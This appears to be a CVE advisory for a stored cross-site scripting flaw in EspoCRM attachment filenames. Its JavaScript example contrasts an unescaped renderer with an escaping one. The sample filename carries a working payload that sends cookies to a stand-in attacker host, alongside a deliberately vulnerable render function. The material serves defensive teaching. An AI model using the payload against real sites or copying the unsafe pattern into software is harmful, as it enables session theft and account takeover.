Stored Cross-Site Scripting in EspoCRM by EspoCRM, Inc.
CVE-2019-14547

CVSS v3.1 base score: 5.4 (MEDIUM)

Key Information:

Vendor: EspoCRM, Inc.
CVE Published: 5 August 2019

What is CVE-2019-14547?

EspoCRM versions prior to 5.6.9 contain a stored cross-site scripting (XSS) vulnerability in the handling of attachment filenames. An authenticated, low-privileged user uploads an attachment whose filename contains JavaScript and sends it to an administrator. The filename is stored with the attachment and rendered without adequate escaping, so the script executes in the administrator's browser when the administrator interacts with the file. Because it runs in the administrator's authenticated session, the payload can read session cookies or issue requests on the administrator's behalf, which can lead to cookie theft and account compromise. The issue is fixed in EspoCRM 5.6.9.
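As an added illustration, not code from EspoCRM or from the advisory, the following shows why a stored attachment name is dangerous when it is rendered by string concatenation and how contextual escaping neutralises it. The record shape, the download URL, the attacker host and every function name are assumptions; the malicious attachment name is constructed for the example.

```javascript
// Added example (not EspoCRM code). Shows a stored filename becoming XSS when
// concatenated into markup, and the same filename rendered safely.
// Record shape, URL, host and function names are assumptions.

// Constructed sample: an attachment record as an attacker could have stored it.
// The name closes the double-quoted title attribute, closes the <a> tag, and
// injects an <img> whose onerror handler exfiltrates the victim's cookies to
// a hypothetical attacker host.
const SAMPLE_ATTACHMENT = {
  id: '5d47c0ffee1234567',
  name: '"><img src=x onerror="new Image().src=\'https://attacker.example/?c=\'+document.cookie">report.pdf',
};

const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// Escapes a string for use in HTML text and double-quoted attribute contexts.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Vulnerable pattern: the stored name is dropped into the markup verbatim.
function renderAttachmentLinkUnsafe(att) {
  return '<a href="?entryPoint=download&id=' + att.id + '" title="' + att.name + '">' +
    att.name + '</a>';
}

// Hardened pattern: the id goes into a URL, so it is allow-listed rather than
// escaped; the name is escaped for both the attribute and the text context.
function renderAttachmentLinkSafe(att) {
  if (!/^[A-Za-z0-9]{1,32}$/.test(att.id)) {
    throw new Error('invalid attachment id');
  }
  const name = escapeHtml(att.name);
  return '<a href="?entryPoint=download&amp;id=' + att.id + '" title="' + name + '">' +
    name + '</a>';
}

// Lists every tag in a rendered fragment that is not the single <a>...</a>
// the template itself emits; anything returned came from the data.
function injectedTags(html) {
  const tags = html.match(/<\/?[A-Za-z][^>]*>/g) || [];
  return tags.filter((t) => !/^<a\s/.test(t) && t !== '</a>');
}

console.log('unsafe render injects:', injectedTags(renderAttachmentLinkUnsafe(SAMPLE_ATTACHMENT)));
console.log('safe render injects:', injectedTags(renderAttachmentLinkSafe(SAMPLE_ATTACHMENT)));
```

Rejecting or renaming suspicious filenames at upload time is worthwhile defence in depth, but it is not the fix: the browser only executes what reaches the page unescaped, so escaping at the point of output is what closes the hole, and it must be applied in every view that shows the name, not just the one where the report was written.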

CVSS v3.1

Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
Score: 5.4
Severity: MEDIUM
Attack Vector: Network
Attack Complexity: Low
Privileges Required: Low (an authenticated user who can upload an attachment)
User Interaction: Required (the administrator must interact with the attachment)
Scope: Changed (the script runs in the victim's browser, not in the vulnerable component)
Confidentiality: Low
Integrity: Low
Availability: None
